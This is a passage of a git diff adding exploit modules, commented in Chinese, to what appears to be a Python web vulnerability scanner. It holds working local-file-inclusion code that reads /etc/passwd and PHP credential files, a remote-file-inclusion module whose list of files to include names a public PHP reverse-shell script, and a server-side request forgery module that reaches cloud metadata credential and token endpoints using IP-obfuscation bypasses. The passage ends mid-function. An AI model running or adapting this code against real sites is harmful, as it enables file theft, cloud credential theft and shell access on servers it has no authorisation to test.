+            query_params[parameter] = file_path
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否含有敏感文件内容
+            if response and response.status_code == 200:
+                file_content = self._extract_file_content(response.text, file_path)
+                if file_content:
+                    logger.info(f"成功读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用LFI漏洞读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'file_content': file_content[:1000] + ('...' if len(file_content) > 1000 else ''),
+                            'full_content_length': len(file_content)
+                        },
+                        'poc': new_url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试访问文件时出错: {str(e)}")
+            
+        return None
+        
+    def _try_wrapper_access(self, url, parameter, wrapper, file_path):
+        """
+        尝试使用PHP包装器访问文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            wrapper: PHP包装器
+            file_path: 文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            payload = wrapper + file_path
+            logger.info(f"尝试使用包装器访问文件: {payload}")
+            
+            # 构建注入URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否包含Base64编码内容
+            if response and response.status_code == 200:
+                # 检查是否包含Base64编码的内容
+                base64_content = self._extract_base64_content(response.text)
+                if base64_content:
+                    try:
+                        decoded_content = base64.b64decode(base64_content).decode('utf-8', errors='ignore')
+                        logger.info(f"成功使用包装器读取文件: {file_path}")
+                        return {
+                            'success': True,
+                            'message': f'成功利用LFI漏洞使用PHP包装器读取文件: {file_path}',
+                            'data': {
+                                'file_path': file_path,
+                                'wrapper': wrapper,
+                                'file_content': decoded_content[:1000] + ('...' if len(decoded_content) > 1000 else ''),
+                                'full_content_length': len(decoded_content)
+                            },
+                            'poc': new_url
+                        }
+                    except Exception as e:
+                        logger.error(f"Base64解码失败: {str(e)}")
+                        
+        except Exception as e:
+            logger.error(f"尝试使用包装器访问文件时出错: {str(e)}")
+            
+        return None
+        
+    def _try_traversal_access(self, url, parameter, traversal_path, file_path):
+        """
+        尝试使用目录遍历访问文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            traversal_path: 目录遍历路径
+            file_path: 文件路径
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            # 处理绝对路径，只保留文件名
+            if file_path.startswith('/'):
+                file_name = file_path.split('/')[-1]
+            elif file_path.startswith('C:\\') or file_path.startswith('C:/'):
+                file_name = file_path.replace('\\', '/').split('/')[-1]
+            else:
+                file_name = file_path
+                
+            payload = traversal_path + file_name
+            logger.info(f"尝试使用目录遍历访问文件: {payload}")
+            
+            # 构建注入URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = payload
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否含有敏感文件内容
+            if response and response.status_code == 200:
+                file_content = self._extract_file_content(response.text, file_path)
+                if file_content:
+                    logger.info(f"成功使用目录遍历读取文件: {file_path}")
+                    return {
+                        'success': True,
+                        'message': f'成功利用LFI漏洞使用目录遍历读取文件: {file_path}',
+                        'data': {
+                            'file_path': file_path,
+                            'traversal_pattern': traversal_path,
+                            'file_content': file_content[:1000] + ('...' if len(file_content) > 1000 else ''),
+                            'full_content_length': len(file_content)
+                        },
+                        'poc': new_url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试使用目录遍历访问文件时出错: {str(e)}")
+            
+        return None
+        
+    def _extract_file_content(self, response_text, file_path):
+        """
+        从响应中提取文件内容
+        
+        Args:
+            response_text: 响应文本
+            file_path: 尝试访问的文件路径
+            
+        Returns:
+            str: 提取的文件内容，如果未找到返回None
+        """
+        # 根据文件类型识别特征
+        if '/etc/passwd' in file_path:
+            # 查找/etc/passwd文件特征
+            if re.search(r"root:.*:0:0:", response_text):
+                # 提取完整的passwd文件内容
+                passwd_lines = re.findall(r"([a-z_][a-z0-9_-]*:[^:]*:[0-9]*:[0-9]*:[^:]*:[^:]*:[^\n]*)", response_text)
+                if passwd_lines:
+                    return "\n".join(passwd_lines)
+                    
+        elif '/etc/hosts' in file_path:
+            # 查找/etc/hosts文件特征
+            if re.search(r"127\.0\.0\.1\s+localhost", response_text):
+                # 提取完整的hosts文件内容
+                hosts_content = re.search(r"(127\.0\.0\.1\s+localhost.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if hosts_content:
+                    return hosts_content.group(1)
+                    
+        elif 'win.ini' in file_path.lower():
+            # 查找win.ini文件特征
+            if re.search(r"\[fonts\]|\[extensions\]", response_text, re.IGNORECASE):
+                # 提取完整的win.ini文件内容
+                win_ini_content = re.search(r"(\[fonts\].*?)(</|\n\n|$)", response_text, re.DOTALL | re.IGNORECASE)
+                if win_ini_content:
+                    return win_ini_content.group(1)
+                    
+        elif 'httpd.conf' in file_path or 'apache' in file_path:
+            # 查找Apache配置文件特征
+            if re.search(r"<VirtualHost|ServerName|DocumentRoot", response_text):
+                # 提取配置文件片段
+                apache_content = re.search(r"(ServerName.*?|<VirtualHost.*?|DocumentRoot.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if apache_content:
+                    return apache_content.group(1)
+                    
+        elif 'nginx.conf' in file_path:
+            # 查找Nginx配置文件特征
+            if re.search(r"server\s*{|http\s*{|location\s*", response_text):
+                # 提取配置文件片段
+                nginx_content = re.search(r"(server\s*{.*?|http\s*{.*?)(</|\n\n|$)", response_text, re.DOTALL)
+                if nginx_content:
+                    return nginx_content.group(1)
+                    
+        elif '.php' in file_path:
+            # 查找PHP文件特征
+            if re.search(r"<\?php|DB_|PASSWORD|HOST|USER", response_text, re.IGNORECASE):
+                # 提取PHP代码片段
+                php_content = re.search(r"(<\?php.*?\?>|define\s*\(\s*['\"](DB_|HOST|USER|PASSWORD).*?;)", response_text, re.DOTALL | re.IGNORECASE)
+                if php_content:
+                    return php_content.group(1)
+                    
+        elif '.log' in file_path:
+            # 查找日志文件特征
+            if re.search(r"\[\d{2}/\w{3}/\d{4}.*?\]|\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", response_text):
+                # 提取日志条目
+                log_entries = re.findall(r"(\[\d{2}/\w{3}/\d{4}.*?\].*?)\n", response_text)
+                if log_entries:
+                    return "\n".join(log_entries[:20]) + ("\n..." if len(log_entries) > 20 else "")
+                    
+        # 通用文件内容检测
+        # 尝试根据文件类型的常见特征来判断是否成功读取到文件内容
+        file_extension = file_path.split('.')[-1].lower() if '.' in file_path else ''
+        
+        if file_extension in ['txt', 'ini', 'conf', 'config', 'json', 'xml', 'yaml', 'yml']:
+            # 检查是否包含文件结构特征
+            if re.search(r"[\{\}\[\]=:\\><\n]", response_text) and len(response_text) > 20:
+                # 返回前1000个字符作为文件内容
+                return response_text[:1000]
+                
+        # 如果无法确定具体文件类型，但响应不是HTML格式，可能是成功的
+        if not re.search(r"<!DOCTYPE html>|<html|<body|<head", response_text, re.IGNORECASE) and len(response_text) > 20:
+            # 返回前1000个字符作为文件内容
+            return response_text[:1000]
+            
+        return None
+        
+    def _extract_base64_content(self, response_text):
+        """
+        从响应中提取Base64编码内容
+        
+        Args:
+            response_text: 响应文本
+            
+        Returns:
+            str: 提取的Base64内容，如果未找到返回None
+        """
+        # 查找可能的Base64编码字符串
+        base64_pattern = r"([A-Za-z0-9+/]{20,}={0,2})"
+        matches = re.findall(base64_pattern, response_text)
+        
+        # 检查每个匹配项是否是有效的Base64编码
+        for match in matches:
+            try:
+                # 尝试解码
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
+                
+                # 检查解码后的内容是否包含敏感信息
+                if (re.search(r"<\?php|root:|DOCTYPE|html|password=", decoded, re.IGNORECASE) and 
+                    len(decoded) > 20):
+                    return match
+                    
+            except Exception:
+                continue
+                
+        return None 
\ No newline at end of file
diff --git a/xss_scanner/exploits/rfi_exploit.py b/xss_scanner/exploits/rfi_exploit.py
new file mode 100644
index 0000000..9ae85c6
--- /dev/null
+++ b/xss_scanner/exploits/rfi_exploit.py
@@ -0,0 +1,267 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+RFI（远程文件包含）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import base64
+import requests
+
+logger = logging.getLogger('xss_scanner')
+
+class RFIExploit:
+    """RFI漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化RFI漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 远程测试文件URL列表
+        self.remote_test_files = [
+            "http://www.google.com/humans.txt",
+            "https://www.bing.com/robots.txt",
+            "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/phpinfo.php",
+            "https://raw.githubusercontent.com/tennc/webshell/master/php/php-reverse-shell.php"
+        ]
+        
+        # RFI测试代码片段
+        self.test_code_snippets = [
+            "<?php echo 'RFI_TEST_'.rand(1000,9999); ?>",
+            "<?php echo md5('RFI_TEST'); ?>",
+            "<?php echo base64_encode('RFI_TEST_'.time()); ?>",
+            "<?php phpinfo(); ?>"
+        ]
+        
+        # 远程测试代码的可能托管服务
+        self.remote_code_hosts = [
+            "https://pastebin.com/raw/",
+            "https://gist.githubusercontent.com/raw/",
+            "https://raw.githubusercontent.com/"
+        ]
+        
+        # 常见参数名
+        self.common_parameters = [
+            "file", 
+            "page", 
+            "url", 
+            "uri", 
+            "path", 
+            "filepath", 
+            "load", 
+            "include", 
+            "require", 
+            "doc",
+            "document", 
+            "folder", 
+            "root", 
+            "cont", 
+            "content", 
+            "layout",
+            "mod", 
+            "module", 
+            "template"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用RFI漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用RFI漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试远程文件测试
+        for remote_url in self.remote_test_files:
+            result = self._try_remote_file(url, parameter, remote_url)
+            if result and result['success']:
+                return result
+                
+        # 生成随机标记用于验证
+        verification_mark = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
+        logger.info(f"生成验证标记: {verification_mark}")
+        
+        # 如果远程文件测试不成功，尝试创建一个自定义的远程测试文件
+        # 实际应用中，需要一个可控的Web服务器来托管这些文件
+        # 这里只是演示性代码
+        test_code = f"<?php echo 'RFI_VERIFICATION_{verification_mark}'; ?>"
+        
+        # 返回结果
+        # 注意：实际利用需要真实的远程服务器来托管恶意代码
+        return {
+            'success': False,
+            'message': '在实际环境中，需要一个可控的远程Web服务器托管PHP代码来完成RFI漏洞利用',
+            'data': {
+                'verification_code': test_code,
+                'parameter': parameter,
+                'url': url
+            },
+            'poc': f"要验证RFI漏洞，请在你控制的Web服务器托管包含 '{test_code}' 的PHP文件，然后设置URL参数 {parameter}={{'你的PHP文件URL'}}",
+            'manual_steps': [
+                "1. 在你控制的Web服务器上创建一个PHP文件，内容为: " + test_code,
+                "2. 确保该PHP文件可通过HTTP/HTTPS访问",
+                f"3. 构造URL: {url}?{parameter}=http://your-server.com/your-file.php",
+                f"4. 如果响应中包含 'RFI_VERIFICATION_{verification_mark}'，则确认存在RFI漏洞"
+            ]
+        }
+        
+    def _try_remote_file(self, url, parameter, remote_url):
+        """
+        尝试包含远程文件
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            remote_url: 远程文件URL
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试包含远程文件: {remote_url}")
+            
+            # 构建RFI测试URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = remote_url
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 先获取远程文件内容，以便后续比较
+            try:
+                remote_response = requests.get(remote_url, timeout=5)
+                if not remote_response.ok:
+                    logger.warning(f"无法获取远程文件内容: {remote_url}")
+                    return None
+                    
+                remote_content = remote_response.text
+                logger.info(f"成功获取远程文件内容，长度: {len(remote_content)} 字节")
+                
+                # 获取远程文件的特征以便检测
+                # 提取特征，最多50个字符
+                feature_length = min(50, len(remote_content))
+                if feature_length > 0:
+                    remote_feature = remote_content[:feature_length]
+                else:
+                    logger.warning("远程文件内容为空")
+                    return None
+                    
+            except Exception as e:
+                logger.error(f"获取远程文件内容时出错: {str(e)}")
+                return None
+                
+            # 发送包含请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应是否包含远程文件内容
+            if response and response.status_code == 200:
+                # 检查响应中是否包含远程文件的特征
+                if remote_feature and remote_feature in response.text:
+                    logger.info(f"成功包含远程文件，发现特征: {remote_feature[:20]}...")
+                    return {
+                        'success': True,
+                        'message': f'成功利用RFI漏洞包含远程文件: {remote_url}',
+                        'data': {
+                            'remote_url': remote_url,
+                            'parameter': parameter,
+                            'feature_found': remote_feature[:20] + ('...' if len(remote_feature) > 20 else '')
+                        },
+                        'poc': new_url
+                    }
+                elif "phpinfo" in remote_url.lower() and "PHP Version" in response.text and "PHP License" in response.text:
+                    # 特殊检测: phpinfo()
+                    logger.info("成功包含远程PHP文件，执行了phpinfo()")
+                    return {
+                        'success': True,
+                        'message': '成功利用RFI漏洞包含远程PHP文件并执行了phpinfo()',
+                        'data': {
+                            'remote_url': remote_url,
+                            'parameter': parameter,
+                            'php_version': self._extract_php_version(response.text)
+                        },
+                        'poc': new_url
+                    }
+                elif "shell" in remote_url.lower() and "system" in response.text and "exec" in response.text:
+                    # 特殊检测: 可能的webshell
+                    logger.info("成功包含远程PHP文件，可能是webshell")
+                    return {
+                        'success': True,
+                        'message': '成功利用RFI漏洞包含远程PHP文件(可能是webshell)',
+                        'data': {
+                            'remote_url': remote_url,
+                            'parameter': parameter,
+                            'warning': '检测到可能包含危险函数的代码'
+                        },
+                        'poc': new_url
+                    }
+                    
+        except Exception as e:
+            logger.error(f"尝试包含远程文件时出错: {str(e)}")
+            
+        return None
+        
+    def _extract_php_version(self, phpinfo_output):
+        """
+        从phpinfo()输出中提取PHP版本
+        
+        Args:
+            phpinfo_output: phpinfo()函数的输出
+            
+        Returns:
+            str: PHP版本
+        """
+        # 尝试提取PHP版本
+        version_match = re.search(r"PHP Version[\s]*[=>]*[\s]*([0-9.]+)", phpinfo_output)
+        if version_match:
+            return version_match.group(1)
+        return "未知"
+        
+    def _create_remote_test_file(self, test_code):
+        """
+        创建远程测试文件
+        
+        Args:
+            test_code: 测试代码
+            
+        Returns:
+            str: 远程文件URL
+        """
+        # 在实际应用中，这个函数应该将测试代码上传到可控的Web服务器
+        # 并返回可访问的URL
+        # 这里仅作为演示，返回一个假的URL
+        logger.warning("创建远程测试文件功能需要实际的Web服务器支持")
+        return "http://example.com/test_rfi.php" 
\ No newline at end of file
diff --git a/xss_scanner/exploits/sqli_exploit.py b/xss_scanner/exploits/sqli_exploit.py
new file mode 100644
index 0000000..4422b26
--- /dev/null
+++ b/xss_scanner/exploits/sqli_exploit.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SQL注入漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+
+logger = logging.getLogger('xss_scanner')
+
+class SQLInjectionExploit:
+    """SQL注入漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SQL注入漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        self.current_dbms = None  # 数据库类型
+        
+    def exploit(self, vulnerability):
+        """
+        利用SQL注入漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用SQL注入漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+        
+        # 简化版实现 - 返回基本信息
+        return {
+            'success': True,
+            'message': '成功生成SQL注入利用PoC',
+            'data': {
+                'url': url,
+                'parameter': parameter,
+                'payload': payload
+            },
+            'poc': f"{url}?{parameter}={urllib.parse.quote(payload)}"
+        } 
\ No newline at end of file
diff --git a/xss_scanner/exploits/ssrf_exploit.py b/xss_scanner/exploits/ssrf_exploit.py
new file mode 100644
index 0000000..962bb92
--- /dev/null
+++ b/xss_scanner/exploits/ssrf_exploit.py
@@ -0,0 +1,527 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SSRF（服务器端请求伪造）漏洞利用模块
+"""
+
+import logging
+import re
+import urllib.parse
+import random
+import string
+import socket
+import json
+import ipaddress
+
+logger = logging.getLogger('xss_scanner')
+
+class SSRFExploit:
+    """SSRF漏洞利用类"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SSRF漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 内部服务目标
+        self.internal_targets = [
+            "127.0.0.1",           # 本地主机
+            "localhost",           # 本地主机
+            "0.0.0.0",             # 任意地址
+            "10.0.0.0/8",          # 私有IP A类
+            "172.16.0.0/12",       # 私有IP B类
+            "192.168.0.0/16",      # 私有IP C类
+            "169.254.169.254",     # AWS元数据服务
+            "metadata.google.internal", # GCP元数据
+            "100.100.100.200",     # 阿里云元数据
+            "169.254.169.254",     # Azure元数据
+            "127.0.0.1:25",        # SMTP
+            "127.0.0.1:22",        # SSH
+            "127.0.0.1:1433",      # MS SQL
+            "127.0.0.1:3306",      # MySQL
+            "127.0.0.1:5432",      # PostgreSQL
+            "127.0.0.1:6379",      # Redis
+            "127.0.0.1:9200",      # Elasticsearch
+            "127.0.0.1:11211",     # Memcached
+            "127.0.0.1:27017",     # MongoDB
+            "127.0.0.1:8500",      # Consul
+            "127.0.0.1:2375",      # Docker API
+            "127.0.0.1:8080",      # 常见Web服务
+            "127.0.0.1:8000",      # 常见Web服务
+            "127.0.0.1:5000",      # 常见Web服务
+            "127.0.0.1:3000"       # 常见Web服务
+        ]
+        
+        # 内部服务路径
+        self.service_paths = {
+            "redis": ["/", ""],
+            "mysql": ["/", ""],
+            "elasticsearch": ["/", "/_cat/indices", "/_cluster/health"],
+            "mongodb": ["/", "/stats"],
+            "memcached": ["/", ""],
+            "docker": ["/", "/images/json", "/containers/json"],
+            "etcd": ["/", "/v2/keys", "/v2/members"],
+            "consul": ["/v1/catalog/services", "/v1/agent/self"],
+            "kubernetes": ["/api/v1/pods", "/api/v1/namespaces"]
+        }
+        
+        # 云服务商元数据URL
+        self.cloud_metadata_urls = {
+            "aws": [
+                "http://169.254.169.254/latest/meta-data/",
+                "http://169.254.169.254/latest/meta-data/local-hostname",
+                "http://169.254.169.254/latest/meta-data/public-hostname",
+                "http://169.254.169.254/latest/meta-data/local-ipv4",
+                "http://169.254.169.254/latest/meta-data/public-ipv4",
+                "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
+            ],
+            "gcp": [
+                "http://metadata.google.internal/computeMetadata/v1/",
+                "http://metadata.google.internal/computeMetadata/v1/instance/hostname",
+                "http://metadata.google.internal/computeMetadata/v1/instance/id",
+                "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
+            ],
+            "azure": [
+                "http://169.254.169.254/metadata/instance?api-version=2019-06-01",
+                "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01"
+            ],
+            "alibaba": [
+                "http://100.100.100.200/latest/meta-data/",
+                "http://100.100.100.200/latest/meta-data/instance-id",
+                "http://100.100.100.200/latest/meta-data/region-id"
+            ]
+        }
+        
+        # IP替代表示法
+        self.ip_alternative_forms = {
+            "127.0.0.1": [
+                "localhost",
+                "127.0.1",
+                "127.1",
+                "2130706433",           # 十进制表示
+                "0x7f000001",           # 十六进制表示
+                "0177.0.0.01",          # 八进制表示
+                "0177.0.0.1",
+                "0177.0.1",
+                "0177.1",
+                "::1",                  # IPv6表示
+                "::ffff:127.0.0.1",     # IPv6 映射
+                "[::1]",
+                "[::ffff:127.0.0.1]",
+                "1278.1.1.1"
+            ]
+        }
+        
+        # SSRF绕过技术
+        self.ssrf_bypasses = [
+            "@",                 # URL认证绕过（user:pass@host）
+            "#",                 # URL片段
+            "?",                 # URL查询参数
+            "%23",               # URL编码的#
+            "%3F",               # URL编码的?
+            "\r\n",              # CRLF注入
+            "%0D%0A",            # URL编码的CRLF
+            "/.",                # 目录遍历
+            "//"                 # 双斜杠
+        ]
+        
+        # 常见参数名
+        self.common_parameters = [
+            "url", 
+            "uri", 
+            "link", 
+            "src", 
+            "source", 
+            "redirect", 
+            "redirect_to", 
+            "image", 
+            "img", 
+            "file", 
+            "download", 
+            "upload", 
+            "domain", 
+            "host", 
+            "port", 
+            "callback", 
+            "return", 
+            "return_to", 
+            "next", 
+            "target", 
+            "feed", 
+            "fetch", 
+            "site", 
+            "html", 
+            "page", 
+            "data", 
+            "reference", 
+            "reference_url"
+        ]
+        
+    def exploit(self, vulnerability):
+        """
+        利用SSRF漏洞
+        
+        Args:
+            vulnerability: 漏洞信息
+            
+        Returns:
+            dict: 利用结果
+        """
+        logger.info(f"尝试利用SSRF漏洞: {vulnerability['url']}")
+        
+        url = vulnerability.get('url')
+        parameter = vulnerability.get('parameter')
+        payload = vulnerability.get('payload', '')
+        
+        if not url or not parameter:
+            return {
+                'success': False,
+                'message': '缺少必要的漏洞信息(URL或参数名)',
+                'data': None
+            }
+            
+        # 尝试探测内部服务
+        internal_services = []
+        successful_payloads = []
+        
+        # 生成随机标记用于OAST（带外应用安全测试）
+        verification_id = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
+        oast_domain = f"ssrf-{verification_id}.example.com"
+        oast_url = f"http://{oast_domain}/"
+        
+        logger.info(f"生成的OAST域名: {oast_domain}")
+        
+        # 0. 首先尝试OAST探测（如果有真实的回调服务器）
+        if hasattr(self, 'callback_server') and self.callback_server:
+            logger.info("尝试使用OAST检测SSRF漏洞")
+            result = self._try_oast_detection(url, parameter, oast_url)
+            if result and result['success']:
+                return result
+                
+        # 1. 尝试本地服务
+        logger.info("尝试探测本地服务")
+        for target in self.internal_targets[:5]:  # 只尝试前5个目标
+            # 基本请求
+            result = self._try_internal_service(url, parameter, f"http://{target}")
+            if result and result['success']:
+                internal_services.append(result['data']['target'])
+                successful_payloads.append(result['data']['payload'])
+                logger.info(f"发现可访问的内部服务: {target}")
+                
+            # 尝试一些端口，如果目标是IP地址
+            if re.match(r"^\d+\.\d+\.\d+\.\d+$", target):
+                for port in [80, 8080, 8000, 5000, 3000, 22, 6379]:
+                    result = self._try_internal_service(url, parameter, f"http://{target}:{port}")
+                    if result and result['success']:
+                        internal_services.append(f"{target}:{port}")
+                        successful_payloads.append(result['data']['payload'])
+                        logger.info(f"发现可访问的内部服务: {target}:{port}")
+                    
+        # 2. 尝试云服务商元数据
+        logger.info("尝试探测云服务商元数据")
+        cloud_metadata = {}
+        for provider, urls in self.cloud_metadata_urls.items():
+            for metadata_url in urls[:2]:  # 只尝试前2个URL
+                result = self._try_internal_service(url, parameter, metadata_url)
+                if result and result['success']:
+                    if provider not in cloud_metadata:
+                        cloud_metadata[provider] = []
+                    cloud_metadata[provider].append({
+                        'url': metadata_url,
+                        'response': result['data'].get('response', ''),
+                        'payload': result['data']['payload']
+                    })
+                    successful_payloads.append(result['data']['payload'])
+                    logger.info(f"发现可访问的云服务商元数据: {metadata_url}")
+        
+        # 3. 尝试一些IP替代表示法绕过手段（针对localhost）
+        logger.info("尝试使用IP替代表示法绕过")
+        for alt_ip in self.ip_alternative_forms["127.0.0.1"][:5]:  # 只尝试前5个替代表示
+            result = self._try_internal_service(url, parameter, f"http://{alt_ip}")
+            if result and result['success']:
+                internal_services.append(alt_ip)
+                successful_payloads.append(result['data']['payload'])
+                logger.info(f"通过IP替代表示法可访问本地服务: {alt_ip}")
+                
+        # 编译结果
+        if internal_services or cloud_metadata:
+            logger.info(f"SSRF利用成功，发现 {len(internal_services)} 个内部服务和 {len(cloud_metadata)} 个云服务商元数据")
+            
+            # 选择一个最可靠的有效载荷作为PoC
+            poc_payload = successful_payloads[0] if successful_payloads else payload
+            
+            # 构建 PoC URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = poc_payload
+            new_query = urllib.parse.urlencode(query_params)
+            poc_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            return {
+                'success': True,
+                'message': 'SSRF漏洞利用成功',
+                'data': {
+                    'internal_services': internal_services,
+                    'cloud_metadata': cloud_metadata,
+                    'successful_payloads': successful_payloads
+                },
+                'poc': poc_url
+            }
+        else:
+            # 如果没有直接成功，返回手动验证步骤
+            logger.info("无法自动确认SSRF漏洞，提供手动验证步骤")
+            return {
+                'success': False,
+                'message': '未能自动确认SSRF漏洞，但可能存在，请尝试手动验证',
+                'data': {
+                    'parameter': parameter,
+                    'url': url,
+                    'oast_domain': oast_domain
+                },
+                'manual_steps': [
+                    "1. 设置一个你控制的外部Web服务器，记录所有接收到的请求",
+                    f"2. 构造URL: {url}?{parameter}=http://your-server.com/ssrf-test",
+                    "3. 如果你的服务器收到来自目标服务器的请求，则确认存在SSRF漏洞",
+                    "4. 尝试以下内部服务目标进行测试:",
+                    "   - http://localhost/",
+                    "   - http://127.0.0.1:8080/",
+                    "   - http://169.254.169.254/latest/meta-data/ (AWS元数据)",
+                    "5. 尝试以下绕过技术:",
+                    "   - http://0177.0.0.1/ (八进制IP)",
+                    "   - http://0x7f000001/ (十六进制IP)",
+                    "   - http://2130706433/ (整数IP)"
+                ]
+            }
+            
+    def _try_internal_service(self, url, parameter, target_url):
+        """
+        尝试通过SSRF访问内部服务
+        
+        Args:
+            url: 目标URL
+            parameter: 参数名
+            target_url: 要访问的内部服务URL
+            
+        Returns:
+            dict: 利用结果
+        """
+        try:
+            logger.info(f"尝试访问内部服务: {target_url}")
+            
+            # 构建SSRF测试URL
+            parsed_url = urllib.parse.urlparse(url)
+            query_params = dict(urllib.parse.parse_qsl(parsed_url.query))
+            query_params[parameter] = target_url
+            
+            # 重建查询字符串
+            new_query = urllib.parse.urlencode(query_params)
+            new_url = urllib.parse.urlunparse((
+                parsed_url.scheme,
+                parsed_url.netloc,
+                parsed_url.path,
+                parsed_url.params,
+                new_query,
+                parsed_url.fragment
+            ))
+            
+            # 发送请求
+            response = self.http_client.get(new_url)
+            
+            # 检查响应，查找SSRF成功的迹象
+            if response and response.status_code == 200:
+                response_text = response.text
+                
+                # 检查常见的SSRF成功迹象
+                success_indicators = self._get_service_indicators(target_url)
+                for indicator in success_indicators:
+                    if indicator in response_text:
+                        logger.info(f"内部服务访问成功，找到特征: {indicator}")
+                        return {
+                            'success': True,
+                            'message': f'成功利用SSRF漏洞访问内部服务: {target_url}',
+                            'data': {
+                                'target': target_url,
+                                'parameter': parameter,
+                                'payload': target_url,
+                                'indicator': indicator,
+                                'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
+                            }
+                        }
+                        
+                # 如果没有找到明确的特征，检查是否有其他常见服务标识
+                if any(keyword in response_text.lower() for keyword in [
+                    'apache', 'nginx', 'iis', 'server', 'service', 'redis', 'mysql', 
+                    'postgresql', 'mongodb', 'memcached', 'elasticsearch', 'forbidden', 'unauthorized',
+                    '401', '403', 'authentication', 'password', 'login', 'admin', 'root', 'error',
+                    '<title>', '<html>', 'json', 'xml', 'internal'
+                ]):
+                    logger.info(f"内部服务可能可以访问，发现常见服务标识")
+                    return {
+                        'success': True,
+                        'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
+                        'data': {
+                            'target': target_url,
+                            'parameter': parameter,
+                            'payload': target_url,
+                            'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
+                        }
+                    }
+                    
+                # 如果HTTP状态码不是404，可能成功了
+                if response.status_code not in [404, 400, 500]:
+                    logger.info(f"内部服务响应了非错误状态码: {response.status_code}")
+                    return {
+                        'success': True,
+                        'message': f'可能成功利用SSRF漏洞访问内部服务: {target_url}',
+                        'data': {
+                            'target': target_url,
+                            'parameter': parameter,
+                            'payload': target_url,
+                            'status_code': response.status_code,
+                            'response': response_text[:200] + ('...' if len(response_text) > 200 else '')
+                        }
